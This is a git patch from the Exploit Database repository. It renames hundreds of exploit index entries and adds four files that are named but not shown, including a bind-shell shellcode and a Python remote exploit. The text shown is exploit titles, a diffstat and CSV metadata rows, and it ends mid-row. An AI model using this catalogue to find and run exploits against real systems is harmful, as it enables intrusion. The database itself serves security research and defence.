From 965b4bba8fcc40d894aee7fe354037507a3297c5 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 20 Jul 2016 05:02:55 +0000 Subject: [PATCH] DB: 2016-07-20 4 new exploits Microsoft Internet Explorer Object Tag Exploit (MS03-020) Microsoft Internet Explorer - Object Tag Exploit (MS03-020) ICQ Pro 2003a Password Bypass Exploit (ca1-icq.asm) ICQ Pro 2003a - Password Bypass Exploit (ca1-icq.asm) Cisco IOS IPv4 Packets Denial of Service Exploit Cisco IOS - IPv4 Packets Denial of Service Exploit Cisco IOS (using hping) Remote Denial of Service Exploit Cisco IOS - (using hping) Remote Denial of Service Exploit Microsoft Windows SQL Server Denial of Service Remote Exploit (MS03-031) Microsoft Windows SQL Server - Denial of Service Remote Exploit (MS03-031) Microsoft Windows RPC DCOM Remote Exploit (18 Targets) Microsoft Windows RPC - DCOM Remote Exploit (18 Targets) man-db 2.4.1 open_cat_stream() Local uid=man Exploit man-db 2.4.1 - open_cat_stream() Local uid=man Exploit Cisco IOS 12.x/11.x HTTP Remote Integer Overflow Exploit Cisco IOS 12.x/11.x - HTTP Remote Integer Overflow Exploit DameWare Mini Remote Control Server SYSTEM Exploit DameWare Mini Remote Control Server - SYSTEM Exploit Microsoft Internet Explorer Object Data Remote Exploit (M03-032) Microsoft Internet Explorer - Object Data Remote Exploit (M03-032) eMule/xMule/LMule OP_SERVERMESSAGE Format String Exploit eMule/xMule/LMule - OP_SERVERMESSAGE Format String Exploit Microsoft WordPerfect Document Converter Exploit (MS03-036) Microsoft WordPerfect Document Converter - Exploit (MS03-036) Roger Wilco 1.x Client Data Buffer Overflow Exploit Roger Wilco 1.x - Client Data Buffer Overflow Exploit Solaris Sadmind Default Configuration Remote Root Exploit Solaris Sadmind - Default Configuration Remote Root Exploit Microsoft Windows Messenger Service Denial of Service Exploit (MS03-043) Microsoft Windows Messenger Service - Denial of Service Exploit (MS03-043) Microsoft Exchange 2000 XEXCH50 Heap Overflow PoC (MS03-046) Microsoft Exchange 2000 - XEXCH50 Heap Overflow PoC (MS03-046) Microsoft Frontpage Server Extensions fp30reg.dll Exploit (MS03-051) Microsoft Frontpage Server Extensions - fp30reg.dll Exploit (MS03-051) Microsoft Windows Workstation Service WKSSVC Remote Exploit (MS03-049) Microsoft Windows Workstation Service - WKSSVC Remote Exploit (MS03-049) Microsoft Windows XP Workstation Service Remote Exploit (MS03-049) Microsoft Windows XP Workstation Service - Remote Exploit (MS03-049) Microsoft Windows Messenger Service Remote Exploit FR (MS03-043) Microsoft Windows Messenger Service - Remote Exploit FR (MS03-043) GateKeeper Pro 4.7 Web proxy Remote Buffer Overflow Exploit GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow Exploit Eudora 6.0.3 Attachment Spoofing Exploit (windows) Foxmail 5.0 PunyLib.dll Remote Stack Overflow Exploit Eudora 6.0.3 - Attachment Spoofing Exploit (Windows) Foxmail 5.0 - PunyLib.dll Remote Stack Overflow Exploit eSignal 7.6 STREAMQUOTE Remote Buffer Overflow Exploit eSignal 7.6 - STREAMQUOTE Remote Buffer Overflow Exploit OpenBSD 2.6 - / 2.7ftpd Remote Exploit OpenBSD 2.6 / 2.7ftpd - Remote Exploit Redhat 6.1 - / 6.2 TTY Flood Users Exploit Redhat 6.1 / 6.2 - TTY Flood Users Exploit Solaris 2.6 - / 7 / 8 Lock Users Out of mailx Exploit Solaris 2.6 / 7 / 8 - Lock Users Out of mailx Exploit Solaris 2.5 - / 2.5.1 getgrnam() Local Overflow Exploit Solaris 2.5 / 2.5.1 - getgrnam() Local Overflow Exploit Solaris 7 - / 8-beta arp Local Overflow Exploit Solaris 7 / 8-beta - arp Local Overflow Exploit Solaris 2.6 - / 2.7 /usr/bin/write Local Overflow Exploit Solaris 2.6 / 2.7 - /usr/bin/write Local Overflow Exploit Cisco Multiple Products Automated Exploit Tool Cisco Multiple Products - Automated Exploit Tool Microsoft Internet Explorer (11 bytes) Denial of Service Exploit Microsoft Internet Explorer - Denial of Service Exploit (11 bytes) PHP <= 4.3.7/ 5.0.0RC3 - memory_limit Remote Exploit PHP <= 4.3.7/5.0.0RC3 - memory_limit Remote Exploit VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid) (updated) VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid) GoodTech Telnet Server < 5.0.7 - Remote BoF Exploit (updated) GoodTech Telnet Server < 5.0.7 - Remote BoF Exploit (2) WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (2nd updated) WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (1st) WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (2) WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (1) Maxwebportal <= 1.36 password.asp Change Password Exploit (3 - perl) Maxwebportal <= 1.36 password.asp Change Password Exploit (2 - php) Maxwebportal <= 1.36 password.asp Change Password Exploit (1 - html) Maxwebportal <= 1.36 password.asp Change Password Exploit (3) (perl) Maxwebportal <= 1.36 password.asp Change Password Exploit (2) (php) Maxwebportal <= 1.36 password.asp Change Password Exploit (1) (html) ProRat Server <= 1.9 - (Fix-2) Buffer Overflow Crash Exploit ProRat Server <= 1.9 (Fix-2) - Buffer Overflow Crash Exploit Microsoft Windows DTC Remote Exploit (PoC) (MS05-051) (updated) Microsoft Windows - DTC Remote Exploit (PoC) (MS05-051) (2) phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (updated) phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (2) Microsoft Windows - ACLs Local Privilege Escalation Exploit (Updated) Microsoft Windows - ACLs Local Privilege Escalation Exploit (2) HPE <= 1.0 - (HPEinc) Remote File Include Vulnerabilities (updated) HPE <= 1.0 - (HPEinc) Remote File Include Vulnerabilities (2) phpBB Journals System Mod 1.0.2 [RC2] - Remote File Include Exploit phpBB Journals System Mod 1.0.2 RC2 - Remote File Include Exploit Mozilla Firefox <= 1.5.0.7/ 2.0 - (createRange) Remote DoS Exploit Mozilla Firefox <= 1.5.0.7/2.0 - (createRange) Remote DoS Exploit BrowseDialog Class (ccrpbds6.dll) Multiple Methods DoS Exploit BrowseDialog Class - (ccrpbds6.dll) Multiple Methods DoS Exploit Asterisk <= 1.2.15 - / 1.4.0 pre-auth Remote Denial of Service Exploit Asterisk <= 1.2.15 / 1.4.0 - pre-auth Remote Denial of Service Exploit PHP < 4.4.5 - / 5.2.1 php_binary Session Deserialization Information Leak PHP < 4.4.5 - / 5.2.1 WDDX Session Deserialization Information Leak PHP < 4.4.5 - / 5.2.1 - php_binary Session Deserialization Information Leak PHP < 4.4.5 - / 5.2.1 - WDDX Session Deserialization Information Leak PHP <= 4.4.6 - / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit PHP <= 4.4.6 / 5.2.1 - array_user_key_compare() ZVAL dtor Local Exploit PHP <= 4.4.6 - / 5.2.1 ext/gd Already Freed Resources Usage Exploit PHP <= 4.4.6 / 5.2.1 - ext/gd Already Freed Resources Usage Exploit Asterisk <= 1.2.16 - / 1.4.1 SIP INVITE Remote Denial of Service Exploit Asterisk <= 1.2.16 / 1.4.1 - SIP INVITE Remote Denial of Service Exploit PHP < 4.4.5 - / 5.2.1 _SESSION unset() Local Exploit PHP < 4.4.5 - / 5.2.1 _SESSION Deserialization Overwrite Exploit PHP < 4.4.5 - / 5.2.1 - _SESSION unset() Local Exploit PHP < 4.4.5 - / 5.2.1 - _SESSION Deserialization Overwrite Exploit PHP 4.4.5 - / 4.4.6 session_decode() Double Free Exploit PoC PHP 4.4.5 / 4.4.6 - session_decode() Double Free Exploit PoC XOOPS Module MyAds Bug Fix <= 2.04jp (index.php) SQL Injection Exploit XOOPS Module MyAds Bug Fix <= 2.04jp - (index.php) SQL Injection Exploit Kaqoo Auction (install_root) Multiple Remote File Include Vulnerabilities Kaqoo Auction - (install_root) Multiple Remote File Include Vulnerabilities Asterisk < 1.2.22 - / 1.4.8 / 2.2.1 chan_skinny Remote Denial of Service Asterisk < 1.2.22 / 1.4.8 / 2.2.1 - chan_skinny Remote Denial of Service Weblogicnet (files_dir) Multiple Remote File Inclusion Vulnerabilities Weblogicnet - (files_dir) Multiple Remote File Inclusion Vulnerabilities PHP <= 4.4.7 - / 5.2.3 MySQL/MySQLi Safe Mode Bypass PHP <= 4.4.7 / 5.2.3 - MySQL/MySQLi Safe Mode Bypass EB Design Pty Ltd (EBCRYPT.DLL 2.0) Multiple Remote Vulnerabilites EB Design Pty Ltd - (EBCRYPT.DLL 2.0) Multiple Remote Vulnerabilites Lama Software (14.12.2007) Multiple Remote File Inclusion Vulnerabilities Lama Software 14.12.2007 - Multiple Remote File Inclusion Vulnerabilities sCssBoard (pwnpack) Multiple Versions Remote Exploit sCssBoard - (pwnpack) Multiple Versions Remote Exploit Data Dynamics ActiveBar (Actbar3.ocx 3.2) Multiple Insecure Methods Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods Shader TV (Beta) Multiple Remote SQL Injection Vulnerabilities Shader TV (Beta) - Multiple Remote SQL Injection Vulnerabilities Keller Web Admin CMS 0.94 Pro Local File Inclusion Keller Web Admin CMS 0.94 Pro - Local File Inclusion Keller Web Admin CMS 0.94 Pro Local File Inclusion (1st) \o - Local File Inclusion (1st) HRS Multi (picture_pic_bv.asp key) Blind SQL Injection Exploit HRS Multi - (picture_pic_bv.asp key) Blind SQL Injection Exploit Kasra CMS (index.php) Multiple SQL Injection Vulnerabilities Kasra CMS - (index.php) Multiple SQL Injection Vulnerabilities Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - < UDEV 1.4.1 Local Privilege Escalation Exploit (1) Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV < 1.4.1 Local Privilege Escalation Exploit (1) Linux Kernel 2.6.x (<= 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10) (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit Linux Kernel <= 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit Mac OS X - Java applet Remote Deserialization Remote PoC (Updated) Mac OS X - Java applet Remote Deserialization Remote PoC (2) ZaoCMS (user_updated.php) Remote Change Password Exploit ZaoCMS - (user_updated.php) Remote Change Password Exploit eZoneScripts Hotornot2 Script (Admin Bypass) Multiple Remote Vulnerabilities eZoneScripts Hotornot2 Script - (Admin Bypass) Multiple Remote Vulnerabilities phpdirectorysource (XSS/SQL) Multiple Vulnerabilities phpdirectorysource - (XSS/SQL) Multiple Vulnerabilities Million-Dollar Pixel Ads Platinum (SQL/XSS) Multiple Vulnerabilities Million-Dollar Pixel Ads Platinum - (SQL/XSS) Multiple Vulnerabilities garagesalesjunkie (SQL/XSS) Multiple Vulnerabilities garagesalesjunkie - (SQL/XSS) Multiple Vulnerabilities Miniweb 2.0 Module Publisher (bSQL-XSS) Multiple Vulnerabilities Miniweb 2.0 Module Publisher - (bSQL/XSS) Multiple Vulnerabilities PHP Script Forum Hoster (Topic Delete/XSS) Multiple Vulnerabilities PHP Script Forum Hoster - (Topic Delete/XSS) Multiple Vulnerabilities Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android) Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (Android) GDivX Zenith Player AviFixer Class (fix.dll 1.0.0.1) Buffer Overflow PoC GDivX Zenith Player AviFixer Class - (fix.dll 1.0.0.1) Buffer Overflow PoC Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SUSE 10 SP2/11 / Ubuntu 8.10) - sock_sendpage() Local Root (PPC) Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SUSE 10 SP2/11 / Ubuntu 8.10) - 'sock_sendpage()' Local Root (PPC) phpMySite (XSS/SQLi) Multiple Vulnerabilities phpMySite - (XSS/SQLi) Multiple Vulnerabilities (Tod Miller's) Sudo/SudoEdit 1.6.x / 1.7.x (<= 1.6.9p21 / <= 1.7.2p4) - Local Root Exploit (Tod Miller's) Sudo/SudoEdit <= 1.6.9p21 / <= 1.7.2p4 - Local Root Exploit Preisschlacht Multi Liveshop System SQL Injection (seite&aid) index.php Preisschlacht Multi Liveshop System - SQL Injection (seite&aid) index.php quality point 1.0 newsfeed (SQL/XSS) Multiple Vulnerabilities quality point 1.0 newsfeed - (SQL/XSS) Multiple Vulnerabilities Open Web Analytics 1.2.3 multi file include Open Web Analytics 1.2.3 - multi file include Scratcher (SQL/XSS) Multiple Remote Scratcher - (SQL/XSS) Multiple Remote phpscripte24 Live Shopping Multi Portal System SQL Injection Exploit phpscripte24 Live Shopping Multi Portal System - SQL Injection Exploit e-webtech (fixed_page.asp) SQL Injection e-webtech - (fixed_page.asp) SQL Injection parlic Design (SQL/XSS/HTML) Multiple Vulnerabilities parlic Design - (SQL/XSS/HTML) Multiple Vulnerabilities MileHigh Creative (SQL/XSS/HTML Injection) Multiple Vulnerabilities MileHigh Creative - (SQL/XSS/HTML Injection) Multiple Vulnerabilities CMScout (XSS/HTML Injection) Multiple Vulnerabilities CMScout - (XSS/HTML Injection) Multiple Vulnerabilities k-search (SQL/XSS) Multiple Vulnerabilities k-search - (SQL/XSS) Multiple Vulnerabilities GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabilities GuestBook Script PHP - (XSS/HTML Injection) Multiple Vulnerabilities Max's Guestbook (HTML Injection/XSS) Multiple Vulnerabilities Max's Guestbook - (HTML Injection/XSS) Multiple Vulnerabilities Joomla Component (com_jefaqpro) Multiple Blind SQL Injection Vulnerabilities Joomla Component (com_jefaqpro) - Multiple Blind SQL Injection Vulnerabilities Joomla Component (com_restaurantguide) Multiple Vulnerabilities Joomla Component - (com_restaurantguide) Multiple Vulnerabilities TradeMC E-Ticaret (SQL/XSS) Multiple Vulnerabilities TradeMC E-Ticaret - (SQL/XSS) Multiple Vulnerabilities Projekt Shop (details.php) Multiple SQL Injection Vulnerabilities Projekt Shop - (details.php) Multiple SQL Injection Vulnerabilities CakePHP <= 1.3.5 - / 1.2.8 unserialize() CakePHP <= 1.3.5 / 1.2.8 - unserialize() Rae Media Real Estate Multi Agent SQL Injection Rae Media Real Estate Multi Agent - SQL Injection Solaris ypupdated Command Execution Solaris - ypupdated Command Execution CakePHP <= 1.3.5 - / 1.2.8 Cache Corruption Exploit CakePHP <= 1.3.5 / 1.2.8 - Cache Corruption Exploit Joomla HM-Community (com_hmcommunity) Multiple Vulnerabilities Joomla HM-Community - (com_hmcommunity) Multiple Vulnerabilities Siemens SIMATIC WinCC Flexible (Runtime) Multiple Vulnerabilities Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities CyberLink Multiple Products File Project Handling Stack Buffer Overflow PoC CyberLink Multiple Products - File Project Handling Stack Buffer Overflow PoC Ruby on Rails ActionPack Inline ERB Code Execution Ruby on Rails ActionPack Inline ERB - Code Execution HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 RPC.YPUpdated Command Execution (1) HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 RPC.YPUpdated Command Execution (2) HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 - RPC.YPUpdated Command Execution (1) HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 - RPC.YPUpdated Command Execution (2) ASTPP VoIP Billing (4cf207a) Multiple Vulnerabilities ASTPP VoIP Billing (4cf207a) - Multiple Vulnerabilities Drummond Miles A1Stats 1.0 a1disp2.cgi Traversal Arbitrary File Read Drummond Miles A1Stats 1.0 a1disp3.cgi Traversal Arbitrary File Read Drummond Miles A1Stats 1.0 a1disp4.cgi Traversal Arbitrary File Read Drummond Miles A1Stats 1.0 - a1disp2.cgi Traversal Arbitrary File Read Drummond Miles A1Stats 1.0 - a1disp3.cgi Traversal Arbitrary File Read Drummond Miles A1Stats 1.0 - a1disp4.cgi Traversal Arbitrary File Read Symantec Norton Personal Firewall 2002/ Kaspersky Labs Anti-Hacker 1.0/BlackIce Server Protection 3.5/BlackICE Defender 2.9 - Auto Block DoS Weakness Symantec Norton Personal Firewall 2002/Kaspersky Labs Anti-Hacker 1.0/BlackIce Server Protection 3.5/BlackICE Defender 2.9 - Auto Block DoS Weakness Oracle WebCenter Sites (FatWire Content Server) Multiple Vulnerabilities Oracle WebCenter Sites (FatWire Content Server) - Multiple Vulnerabilities Microsoft URLScan 2.5/ RSA Security SecurID 5.0 Configuration Enumeration Weakness Microsoft URLScan 2.5/RSA Security SecurID 5.0 - Configuration Enumeration Weakness WinSyslog Interactive Syslog Server 4.21/ long Message Remote Denial of Service WinSyslog Interactive Syslog Server 4.21 - long Message Remote Denial of Service VocalTec VGW120/ VGW480 Telephony Gateway Remote H.225 - Denial of Service VocalTec VGW120/VGW480 Telephony Gateway Remote H.225 - Denial of Service Web Wiz Multiple Products SQL Injection Web Wiz Multiple Products - SQL Injection RealNetworks Multiple Products Multiple Buffer Overflow Vulnerabilities RealNetworks Multiple Products - Multiple Buffer Overflow Vulnerabilities Geodesic Solutions Multiple Products index.php b Parameter SQL Injection Geodesic Solutions Multiple Products - index.php b Parameter SQL Injection HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload HP ProCurve Manager - SNAC UpdateDomainControllerServlet File Upload Linux Kernel 2.6.x (<= 2.6.17.7) - NFS and EXT3 Combination Remote Denial of Service Linux Kernel <= 2.6.17.7 - NFS and EXT3 Combination Remote Denial of Service Apache HTTP Server (<= 1.3.35 / <= 2.0.58 / <= 2.2.2) - Arbitrary HTTP Request Headers Security Weakness Apache HTTP Server <= 1.3.35 / <= 2.0.58 / <= 2.2.2 - Arbitrary HTTP Request Headers Security Weakness Symantec Multiple Products SymEvent Driver Local Denial of Service Symantec Multiple Products - SymEvent Driver Local Denial of Service FreeBSD 5.x I386_Set_LDT() Multiple Local Denial of Service Vulnerabilities FreeBSD 5.x I386_Set_LDT() - Multiple Local Denial of Service Vulnerabilities Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - cgi-bin Remote Code Execution Exploit Apache + PHP < 5.3.12 & < 5.4.2 - cgi-bin Remote Code Execution Exploit Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - Remote Code Execution (Multithreaded Scanner) Apache + PHP < 5.3.12 & < 5.4.2 - Remote Code Execution (Multithreaded Scanner) PHP Multi User Randomizer 2006.09.13 Configure_Plugin.TPL.php Cross-Site Scripting PHP Multi User Randomizer 2006.09.13 - Configure_Plugin.TPL.php Cross-Site Scripting Symantec Multiple Products SPBBCDrv Driver Local Denial of Service Symantec Multiple Products - SPBBCDrv Driver Local Denial of Service Exponent CMS 0.96.5/ 0.96.6 magpie_debug.php url Parameter XSS Exponent CMS 0.96.5/ 0.96.6 magpie_slashbox.php rss_url Parameter XSS Exponent CMS 0.96.5/ 0.96.6 iconspopup.php icodir Variable Traversal Arbitrary Directory Listing Exponent CMS 0.96.5/0.96.6 - magpie_debug.php url Parameter XSS Exponent CMS 0.96.5/0.96.6 - magpie_slashbox.php rss_url Parameter XSS Exponent CMS 0.96.5/0.96.6 - iconspopup.php icodir Variable Traversal Arbitrary Directory Listing Simple OS CMS 0.1c_beta 'login.php' SQL Injection Simple OS CMS 0.1c_beta - 'login.php' SQL Injection WebcamXP 3.72.440/4.05.280 beta /pocketpc camnum Variable Arbitrary Memory Disclosure WebcamXP 3.72.440/4.05.280 beta /show_gallery_pic id Variable Arbitrary Memory Disclosure WebcamXP 3.72.440/4.05.280 beta - /pocketpc camnum Variable Arbitrary Memory Disclosure WebcamXP 3.72.440/4.05.280 beta - /show_gallery_pic id Variable Arbitrary Memory Disclosure Adobe Flash Player 8/ 9.0.x - SWF File 'DeclareFunction2' ActionScript Tag Remote Code Execution Adobe Flash Player 8/9.0.x - SWF File 'DeclareFunction2' ActionScript Tag Remote Code Execution IBM Maximo 4.1/ 5.2 - 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities IBM Maximo 4.1/5.2 - 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities Symantec Multiple Products Client Proxy ActiveX (CLIproxy.dll) Remote Overflow Symantec Multiple Products - Client Proxy ActiveX (CLIproxy.dll) Remote Overflow Blog Ink (Blink) Multiple SQL Injection Vulnerabilities Blog Ink (Blink) - Multiple SQL Injection Vulnerabilities PHP Scripts Now Multiple Products bios.php rank Parameter XSS PHP Scripts Now Multiple Products bios.php rank Parameter SQL Injection PHP Scripts Now Multiple Products - bios.php rank Parameter XSS PHP Scripts Now Multiple Products - bios.php rank Parameter SQL Injection cformsII 11.5/ 13.1 Plugin for WordPress - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities cformsII 11.5/13.1 Plugin for WordPress - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities Native Instruments Multiple Products DLL Loading Arbitrary Code Execution Native Instruments Multiple Products - DLL Loading Arbitrary Code Execution PHP 5.x (< 5.6.2) - Bypass disable_functions Exploit (Shellshock) PHP < 5.6.2 - Bypass disable_functions Exploit (Shellshock) PHP 5.x (< 5.3.6) 'Zip' Extension - 'zip_fread()' Function Denial of Service PHP 5.x (< 5.3.6) OpenSSL Extension - openssl_encrypt Function Plaintext Data Memory Leak DoS PHP 5.x (< 5.3.6) OpenSSL Extension - openssl_decrypt Function Ciphertext Data Memory Leak DoS PHP < 5.3.6 'Zip' Extension - 'zip_fread()' Function Denial of Service PHP < 5.3.6 OpenSSL Extension - openssl_encrypt Function Plaintext Data Memory Leak DoS PHP < 5.3.6 OpenSSL Extension - openssl_decrypt Function Ciphertext Data Memory Leak DoS ManageEngine Multiple Products Authenticated File Upload ManageEngine Multiple Products - Authenticated File Upload BlueSoft Multiple Products Multiple SQL Injection Vulnerabilities BlueSoft Multiple Products - Multiple SQL Injection Vulnerabilities Ay Computer Multiple Products Multiple SQL Injection Vulnerabilities Ay Computer Multiple Products - Multiple SQL Injection Vulnerabilities net4visions Multiple Products 'dir' parameters Multiple Cross Site Scripting Vulnerabilities net4visions Multiple Products - 'dir' parameters Multiple Cross Site Scripting Vulnerabilities Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - overlayfs Privilege Escalation (Access /etc/shadow) Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation (Access /etc/shadow) Webify Multiple Products Multiple HTML Injection and Local File Include Vulnerabilities Webify Multiple Products - Multiple HTML Injection and Local File Include Vulnerabilities AirLive Multiple Products OS Command Injection AirLive Multiple Products - OS Command Injection Sciretech Multiple Products Multiple SQL Injection Vulnerabilities Sciretech Multiple Products - Multiple SQL Injection Vulnerabilities AlienVault Open Source SIEM (OSSIM) Multiple Cross Site Scripting Vulnerabilities AlienVault Open Source SIEM (OSSIM) - Multiple Cross Site Scripting Vulnerabilities Windows x86 - URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() Shellcode (394 bytes) Windows x86 - URLDownloadToFileA() + SetFileAttributesA() + WinExec() + ExitProcess() Shellcode (394 bytes) Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution Riverbed SteelCentral NetProfiler/NetExpress - Remote Code Execution Linux/x86-64 - Syscall Persistent Bind Shell + (Multi-terminal) + Password + Daemon (83_ 148_ 177 bytes) Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String Exploit NewsP Free News Script 1.4.7 - User Credentials Disclosure newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure --- files.csv | 328 ++-- platforms/lin_x86-64/shellcode/40122.txt | 161 ++ platforms/multiple/remote/40125.py | 1730 ++++++++++++++++++++++ platforms/php/webapps/40126.txt | 13 + platforms/php/webapps/40127.txt | 16 + 5 files changed, 2086 insertions(+), 162 deletions(-) create mode 100755 platforms/lin_x86-64/shellcode/40122.txt create mode 100755 platforms/multiple/remote/40125.py create mode 100755 platforms/php/webapps/40126.txt create mode 100755 platforms/php/webapps/40127.txt diff --git a/files.csv b/files.csv index 9045798d3..ffc3ee371 100755 --- a/files.csv +++ b/files.csv @@ -35,7 +35,7 @@ id,file,description,date,author,platform,type,port 34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 - (Apache) Remote Exploit",2003-05-29,anonymous,linux,remote,80 35,platforms/windows/dos/35.c,"Microsoft Windows IIS 5.0 < 5.1 - Remote Denial of Service Exploit",2003-05-31,Shachank,windows,dos,0 36,platforms/windows/remote/36.c,"Microsoft Windows WebDAV - Remote Root Exploit (2)",2003-06-01,alumni,windows,remote,80 -37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0 +37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer - Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0 38,platforms/linux/remote/38.pl,"Apache <= 2.0.45 - APR Remote Exploit",2003-06-08,"Matthew Murphy",linux,remote,80 39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Root Exploit",2003-06-10,gunzip,linux,remote,69 40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 - /usr/mail Local Exploit",2003-06-10,anonymous,linux,local,0 @@ -50,55 +50,55 @@ id,file,description,date,author,platform,type,port 49,platforms/linux/remote/49.c,"Linux eXtremail 1.5.x - Remote Format Strings Exploit",2003-07-02,B-r00t,linux,remote,25 50,platforms/windows/remote/50.pl,"ColdFusion MX - Remote Development Service Exploit",2003-07-07,"angry packet",windows,remote,80 51,platforms/windows/remote/51.c,"Microsoft Windows WebDAV IIS 5.0 - Remote Root Exploit (3) (xwdav)",2003-07-08,Schizoprenic,windows,remote,80 -52,platforms/windows/local/52.asm,"ICQ Pro 2003a Password Bypass Exploit (ca1-icq.asm)",2003-07-09,"Caua Moura Prado",windows,local,0 +52,platforms/windows/local/52.asm,"ICQ Pro 2003a - Password Bypass Exploit (ca1-icq.asm)",2003-07-09,"Caua Moura Prado",windows,local,0 53,platforms/cgi/webapps/53.c,"CCBILL CGI - 'ccbillx.c' whereami.cgi Remote Exploit",2003-07-10,knight420,cgi,webapps,0 54,platforms/windows/remote/54.c,"LeapFTP 2.7.x - Remote Buffer Overflow Exploit",2003-07-12,drG4njubas,windows,remote,21 55,platforms/linux/remote/55.c,"Samba 2.2.8 - (Bruteforce Method) Remote Root Exploit",2003-07-13,Schizoprenic,linux,remote,139 56,platforms/windows/remote/56.c,"Microsoft Windows Media Services - (nsiislog.dll) Remote Exploit",2003-07-14,anonymous,windows,remote,80 57,platforms/solaris/remote/57.txt,"Solaris 2.6/7/8 - (TTYPROMPT in.telnet) Remote Authentication Bypass",2002-11-02,"Jonathan S.",solaris,remote,0 58,platforms/linux/remote/58.c,"Citadel/UX BBS 6.07 - Remote Exploit",2003-07-17,"Carl Livitt",linux,remote,504 -59,platforms/hardware/dos/59.c,"Cisco IOS IPv4 Packets Denial of Service Exploit",2003-07-18,l0cK,hardware,dos,0 +59,platforms/hardware/dos/59.c,"Cisco IOS - IPv4 Packets Denial of Service Exploit",2003-07-18,l0cK,hardware,dos,0 60,platforms/hardware/dos/60.c,"Cisco IOS - 'cisco-bug-44020.c' IPv4 Packet Denial of Service Exploit",2003-07-21,"Martin Kluge",hardware,dos,0 61,platforms/windows/dos/61.c,"Microsoft Windows 2000 - RPC DCOM Interface DoS Exploit",2003-07-21,Flashsky,windows,dos,0 -62,platforms/hardware/dos/62.sh,"Cisco IOS (using hping) Remote Denial of Service Exploit",2003-07-22,zerash,hardware,dos,0 +62,platforms/hardware/dos/62.sh,"Cisco IOS - (using hping) Remote Denial of Service Exploit",2003-07-22,zerash,hardware,dos,0 63,platforms/linux/remote/63.c,"miniSQL (mSQL) 1.3 - Remote GID Root Exploit",2003-07-25,"the itch",linux,remote,1114 64,platforms/windows/remote/64.c,"Microsoft Windows - (RPC DCOM) Remote Buffer Overflow Exploit",2003-07-25,Flashsky,windows,remote,135 -65,platforms/windows/dos/65.c,"Microsoft Windows SQL Server Denial of Service Remote Exploit (MS03-031)",2003-07-25,refdom,windows,dos,0 +65,platforms/windows/dos/65.c,"Microsoft Windows SQL Server - Denial of Service Remote Exploit (MS03-031)",2003-07-25,refdom,windows,dos,0 66,platforms/windows/remote/66.c,"Microsoft Windows 2000/XP - (RPC DCOM) Remote Exploit (MS03-026)",2003-07-26,"H D Moore",windows,remote,135 67,platforms/multiple/remote/67.c,"Apache 1.3.x mod_mylo - Remote Code Execution Exploit",2003-07-28,"Carl Livitt",multiple,remote,80 68,platforms/linux/dos/68.c,"Linux Kernel <= 2.4.20 - decode_fh Denial of Service Exploit",2003-07-29,"Jared Stanbrough",linux,dos,0 -69,platforms/windows/remote/69.c,"Microsoft Windows RPC DCOM Remote Exploit (18 Targets)",2003-07-29,pHrail,windows,remote,135 +69,platforms/windows/remote/69.c,"Microsoft Windows RPC - DCOM Remote Exploit (18 Targets)",2003-07-29,pHrail,windows,remote,135 70,platforms/windows/remote/70.c,"Microsoft Windows - (RPC DCOM) Remote Exploit (48 Targets)",2003-07-30,anonymous,windows,remote,135 71,platforms/linux/local/71.c,"XGalaga 2.0.34 - Local game Exploit (Red Hat 9.0)",2003-07-31,c0wboy,linux,local,0 72,platforms/linux/local/72.c,"xtokkaetama 1.0b - Local Game Exploit (Red Hat 9.0)",2003-08-01,brahma,linux,local,0 73,platforms/windows/dos/73.c,"Trillian 0.74 - Remote Denial of Service 